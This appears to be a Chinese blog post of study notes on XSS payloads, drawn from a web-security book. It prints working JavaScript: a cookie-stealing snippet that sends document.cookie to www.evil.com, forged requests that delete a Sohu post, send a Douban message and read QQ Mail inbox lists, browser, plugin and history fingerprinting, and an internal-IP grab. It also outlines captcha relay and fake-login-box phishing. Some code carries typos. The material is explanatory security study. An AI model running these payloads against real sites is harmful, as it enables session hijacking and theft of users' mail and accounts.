参考资料:《白帽子讲Web安全》吴翰清 著

参见:

百度百科 http://baike.baidu.com/view/50325.htm

维基百科 http://zh.wikipedia.org/zh-cn/%E8%B7%A8%E7%B6%B2%E7%AB%99%E6%8C%87%E4%BB%A4%E7%A2%BC

本文地址:博客园 http://www.cnblogs.com/go2bed/p/4136358.html

含义:

XSS 攻击成功后,攻击者能够对用户当前浏览的页面植入恶意脚本,通过恶意脚本,控制用户的浏览器。这些用以完成各种具体功能的恶意脚本,被称为“XSS PayLoad”。

用法:

Cookie 劫持攻击

攻击者先加载一个远程脚本:

http://www.a.com/test.htm?abc="><script scr=http://www.evil.com/evil.js ></script>

真正的XSS Payload现在这个远程脚本中,避免直接在URL的参数里写入大量的JavaScript代码。

在evil.js中,可以通过如下代码窃取Cookie:

var img=document.createElement("img");

img.src="http://www.evil.com/log?"+escape(document.cookie);

document.body.appendChild(img);

这段代码在页面中插入了一张看不见的图片,同时把document.cookie对象作为参数发送到远程服务器。

事实上,http://www.evil.com/log并不一定要存在,因为这个请求会在远程服务器的Web日志中留下记录。

这样就完成了一个最简单的窃取Cookie的XSS Payload。

黑客可以用这个Cookie直接登录。

防止方法: Cookie的“HttpOnly"标识可以防止"Cookie劫持"。

构造模拟GET和POST请求操作用户的浏览器

删除Sohu博客上的一篇文章

例如在Sohu上有一篇文章, 想通过XSS删除它,该如何做呢?

假设Sohu博客所在域的某页面存在XSS漏洞,那么通过JavaScript,这个过程如下:

正常删除该文章的链接是:

http://blog.sohu.com/manage/entry.do?m=delete&id=156713012

对于攻击者来说,只需要直到文章的id,就能够通过这个请求删除这篇文章了。

攻击者可以通过插入一张图片来发起一个get请求:

var img=document.createElement("img");

img.scr="http://blog.sohu.com/manage/entry.do?m=delete&id=156713012";

document.body.appendChild(img);

攻击者只需要让博客的作者执行这段JavaScript代码(XSS Payload),就会把这篇文章删除。在具体攻击中,攻击者将通过XSS诱使用户执行XSS Payload。

POST表单(Form)在Douban上发送消息

如果表单参数很多的话,通过构造DOM的方式,代码将会很冗长。所以可以直接写HTML代码:

var dd=document.createElement("div");

document.body.appendChild(dd);

dd.innerHTML='<form action="" method="post" id="xssform" name="mbform">'+

'<input type="hidden" name="ck" value="JiuY" />'+

'<input type="hidden" name="mb_text" value="testetst" />' +

'</form'

document.getElementById("xssform").submit();

或者:

通过XMLHttpRequest发送一个POST请求:

var url="http://www.douban.com";

var postStr="ck=JiuY&mb_text=test1234";

var ajax=null;

if (window.XMLHttpRequest){

ajax=new XMLHttpRequest();

} else if (window.ActiveXObject){

ajax=new ActiveXObject("Microsoft.XMLHTTP");

} else {

return;

}

ajax.open("POST",url,true);

ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");

ajax.send(postStr);

ajax.onreadystatechange=function(){

if (ajax.readyState==4 && ajax.status==200){

alert("Done");

}

}

通过XSS Payload读取QMail用户的邮件文件夹

通过抓包并分析发现:点击收件箱后,真正能访问到邮件列表的链接是:

http://m57.mail.qq.com/cgi-bin/mail_list?folderid=1&page=0&s=inbox&sid=6a1hx...

这里有一个无法直接构造出的值:sid。从字面推测,这个sid参数应该是用户ID加密后的值。

所以XSS Payload的思路是先获取到sid的值,然后构造完整的URL,并使用XMLHttpRequest请求到此URL,应该就能得到邮件列表了。XSS Payload如下:

if (top.window.location.href.indexOf("sid=")>0){

var sid=top.window..location.href.substr(top.window.location.href.indexOf("sid=")+4,24);

}

var folder_url="http://"+top.window.location.host+"/cgi-bin/mail_list?folderid=1&page=0&s=inbox&sid="+sid;

var ajax=null;

if (window.XMLHttpRequest){

ajax=new XMLHttpRequest();

} else if (window.ActiveXObject){

ajax=new ActiveXObject("Microsoft.XMLHTTP");

} else {

return;

}

ajax.open("GET",folder_url,true);

ajax.send(null);

ajax.onreadystatechange=function(){

if (ajax.readyState==4 && ajax.status==200){

alert(ajax.responseText);

//document.write(ajax.responseText);

}

}

邮件列表的内容成功被XSS Payload获取到。

XSS钓鱼

XSS并非万能。前面的例子都是Javascript脚本,缺少"与用户的交互",碰到验证码,和修改密码时需要输入旧密码,XSS Payload就会失效。

对于验证码,XSS Payload可以读取页面的内容,将验证码的图片URL发送到远程服务器上来实施--攻击者可以在远程XSS后台接收当前验证码,并将验证码的值返回给当前的XSS Payload,从而绕过验证码。

修改密码的问题比较复杂,为了窃取密码,攻击者可以将XSS与"钓鱼"结合。

实现思路很简单:利用Javascript在当前页面上"画出"一个伪造的登录框,当用户在登录框中输入用户名和密码后,其密码将被发送到黑客的服务器上。

识别用户浏览器

直接读取浏览器的UserAgent对象:

alert(navigator.userAgent);

但是userAgent是可以伪造的。这个信息不一定准确。

由于浏览器之间的实现存在差异,利用这种差异分辨浏览器几乎不会错误。

参考:

if (window.ActiveObject){ //MSIE 6.0 or below

//判断是否IE 7以上

if (document.documentElement && typeof document.documentElement.style.maxHeight!="undefined"){

if (typeof document.adoptNode!="undefined") { //Safari 3 & FF & Opera & Chrome & IE8

//MSIE 8.0

}

//MSIE 7.0

}

return "msie"; //MSIE6.0

}  else if { typeof window.opera!="undefined") { //Opera独占

return "opera";

} else if (typeof window.netscape!="undefined"){ //Mozilla独占

if (typeof window.Iterator !="undefined") {

//Firefox 2.0以上支持这个对象

if (typeof document.styleSheetSets!="undefined"){ //FireFox 3 & Opera 9

//Firefox 3

}

//Firefox 2.0

}

return "mozilla";

} else if (typeof window.pageXOffset!="undefined"){ //Mozilla & Safari

try {

if (typeof external.AddSearchProvider!="undefined"){  //Firefox & Google Chrome

return "Chrome";

}

} catch (e) {

return "safari";

}

} else { //unknown

return "unknown";

}

安全研究者Gareth Heyes曾经找到一种更巧妙的方法,通过很精简的代码,即可识别出不同的浏览器。并可精简为一行代码。

详见 《白帽子讲Web安全》一书。

识别用户安装的软件

在IE中,可以通过判断ActiveX控件的classid是否存在,来推测用户是否安装了该软件。这种方法很早就被用于“挂马攻击"--黑客通过判断用户安装的软件,选择对应的浏览器漏洞,最终达到植入木马的目的。

看如下代码:

try {

var Obj=new ActiveXObject('XunLeiBHO.ThunderIEHelper');

} catch (e){

//异常了,不存在该控件

}

通过收集常见软件的classid,就可以扫描出用户电脑中安装的软件列表,甚至包括软件的版本。

一些第三方软件也可能会泄漏一些信息。比如Flash有一个system.capabilities对象,能够查询客户端电脑中的硬件信息。

在XSS Payload中,可以在Flash的ActionScript中读取system.capabilities对象后,将结果通过ExternalInterface传给页面的javascript。

浏览器的扩展和插件也能被XSS Payload扫描出来。比如对于Firefox的插件和扩展,有着不同的检测方法。

Firefox的插件(Plugins)列表存放在一个DOM对象中,通过查询DOM可以遍历出所有的插件:

所以直接查询"navigator.plugins"对象,就能找到所有的插件了。例如 navigator.plugins[0]

而Chrome的扩展(Extension)要复杂一些。有安全研究者想出了一个方法:通过检测扩展的图标,来判断某个特定的扩展是否存在。

在Chrome中有一个特殊的协议: chrome:// ,Chrome的扩展图标可以通过这个协议被访问到。比如Flash Got扩展的图标,可以这样访问:

chrome://flashgot/skin/icon32.png

扫描Chrome扩展时,只需在Javascript中加载这张图片,如果加载成功,则扩展存在;反之,扩展就不存在。

var m=new Image();

m.onload=function(){

alert(1);//图片存在

};

m.onerror=function(){

alert(2);//图片不存在

};

m.src="chrome://flashgot/skin/icon32.png"; //连接图片

CSS History Hack:

我们再看看另外一个有趣的XSS Payload---通过CSS,来发现一个用户曾经访问过的网站。

原理是利用style的visited属性---如果用户曾经访问过某个链接,那么这个链接的颜色会变得与众不同。

<script>

var websites=[ ... 要检测的访问过的网址列表,可能有几千个...];

//遍历每个URL

for (var i=0;i<websites.length:i++){

var link=document.createElement("a");

link.id="id"+i;

link.href=websites[i];

link.innerHTML=websites[i];

document.write('<style>');

document.write('#id'+i+":visited {color:#FF0000;}");

document.write('</style>');

document.body.appendChild(link);

var color=document.defaultView.getComputedStyle(link,null).getPropertyValue("color");

document.body.removeChild(link);

if (color=="rgb(255,0,0)") { //visited

var item=document.createElement('li');

item.appendChild(link);

document.getElementById('visited').appendChild(item);

} else { //Not visited

var item=document.createElement('li');

item.appendChild(link);

document.getElementById('notvisited').appendChild(item);

}

}

</script>

但是Firefox已经在2010年3月决定修补这个问题。

获取用户的真实IP地址:

很多时候,用户电脑的IP地址隐藏在代理服务器或NAT的后面。

javascript本身并没有获取本地IP地址的能力。一般需要第三方软件来完成。比如,客户端安装了Java环境(JRE),那么XSS就可以通过调用Java Applet的接口获取客户端的本地IP地址。

在XSS攻击框架"Attack API"中,就有一个获取本地IP地址的API:

AttackAPI.dom.getInternalIP=function(){

try {

var sock=new java.net.Socket();

sock.bind(new java.net.InetSocketAddress('0.0.0.0',0));

sock.connect(new java.net.InetSocketAddress(document.domain,(!document.location.port)?80:document.location.port));

return sock.getLocalAddress().getHostAddress();

} catch (e) {}

return '127.0.0.1';

};

此外,还有两个利用Java获取本地网络信息的API。

详见 《白帽子讲Web安全》一书。

XSS Payload知识备忘的更多相关文章

  1. JVM内存知识备忘

    又是一篇备忘... 主要记录一些知识,进行一些资源的汇总. 先来群里liufor大大提供的两张图,清晰易懂: Dockerized Java https://www.youtube.com/watch ...

  2. GIS部分理论知识备忘随笔

    文章版权由作者李晓晖和博客园共有,若转载请于明显处标明出处:http://www.cnblogs.com/naaoveGIS/ 1.高斯克吕格投影带换算 某坐标的经度为112度,其投影的6度带和3度带 ...

  3. JavaScript中JSONObject和JSONArray相关知识备忘(网络转载)

    1.json的格式,有两种: {"key": "value"} //JSONObject(对象) [{"key1": "value ...

  4. Flex知识备忘

    div被flex遮挡 //如果设置z-index无效,那么设置flex加载参数 params.wmode = "Opaque";

  5. DataSet、DataTable和DataGridView知识备忘

    datatable中,获取第i行j列的单元格内容:             string str = DataSet.Tables[0].Rows[i][j].ToString():datagridv ...

  6. 知识备忘phpcms 简单解析一 数据表字段

    PHPCMS V9帮助中心 数据结构 phpcms v9 数据... phpcms v9 数据... PHPSSO 数据库结... phpcms v9 数据表结构 在线版 PHPCMS V9 数据结构 ...

  7. React基础知识备忘

    section-1 //react组件 export class Halo extends React.Component{ constructor(...args){ super(...args); ...

  8. excel 知识备忘

    public void UpdateShapesColor(string value) { foreach (Microsoft.Office.Interop.Excel.Shape chart in ...

  9. java基础知识备忘

    1.java内存分配 a.寄存器cup -- 暂不涉及 b.本地方法栈  -- 虚拟机调用windows功能用的,比如创建文件夹 c.方法区  -- 存放 .class文件,负责存放方法 d.栈 -- ...

随机推荐

  1. jenkins 邮件配置

    jenkins 自带一个邮件的通知的功能,但是自带的邮件通知功能,有点简单不能自定义信息,所以我们安装邮件插件Email-ext plugin.1.首先在系统管理-插件管理-安装Email-ext p ...

  2. Webform(Linq增删改查)

    Linq高集成化的数据访问类,它会自动映射数据库结构,将表名完整映射成为类名,将列名完整映射成字段名数据库数据访问,能大大减少代码量.(1)Linq创建添加LINQ to SQL类,类名需与要连接的数 ...

  3. Nginx学习随笔

    题外话 第一份工作中项目中有DBA和运维,所以平时也只关注开发部分,对数据库和服务器关注比较少,记得那时有用户反馈网站很慢,老大让我联系运维看看是不是服务器的问题,那时也不知道Nginx是个什么东西. ...

  4. bootstrap的下拉框在firefox界面不友好的处理

    http://output.jsbin.com/titaki 以上这个链接在firefix浏览器打开就会发现里面有个小容器,而且下拉按钮样式跟不友好 上谷歌查了一下 1.小容器可以利用select:p ...

  5. 高性能javascript学习笔记系列(4) -算法和流程控制

    参考高性能javascript for in 循环  使用它可以遍历对象的属性名,但是每次的操作都会搜索实例或者原型的属性 导致使用for in 进行遍历会产生更多的开销 书中提到不要使用for in ...

  6. #8.11.16总结#CSS常用样式总结(二)

    border  边框 简写:border:1px solid #000; 等效于:border-width:1px;border-style:solid;border-color:#000; 顺序:b ...

  7. 升级tomcat7的运行日志框架到log4j2,可以打进kafka

    为了让web application能随意使用logging组件而不受web容器自身的影响,从tomcat 6.0开始,tomact默认使用的是java.util.logging framework来 ...

  8. yum源的配置(centos6.5)

    # cd /etc/yum.repos.d/ # mv CentOS-Base.repo CentOS-Base.repo.bak # wget http://mirrors.163.com/.hel ...

  9. 【CoreData】分页查询和模糊查询

    在CoreData实际使用中,分页查询和模糊查询是必不可少的,接下来演示一下: 首先 // 1.创建模型文件 (相当于一个数据库里的表) // New File ———— CoreData ———— ...

  10. 【代码笔记】iOS-抽屉效果的实现

    一,效果图. 二,工程图. 三,代码. RootViewController.h #import <UIKit/UIKit.h> @interface RootViewController ...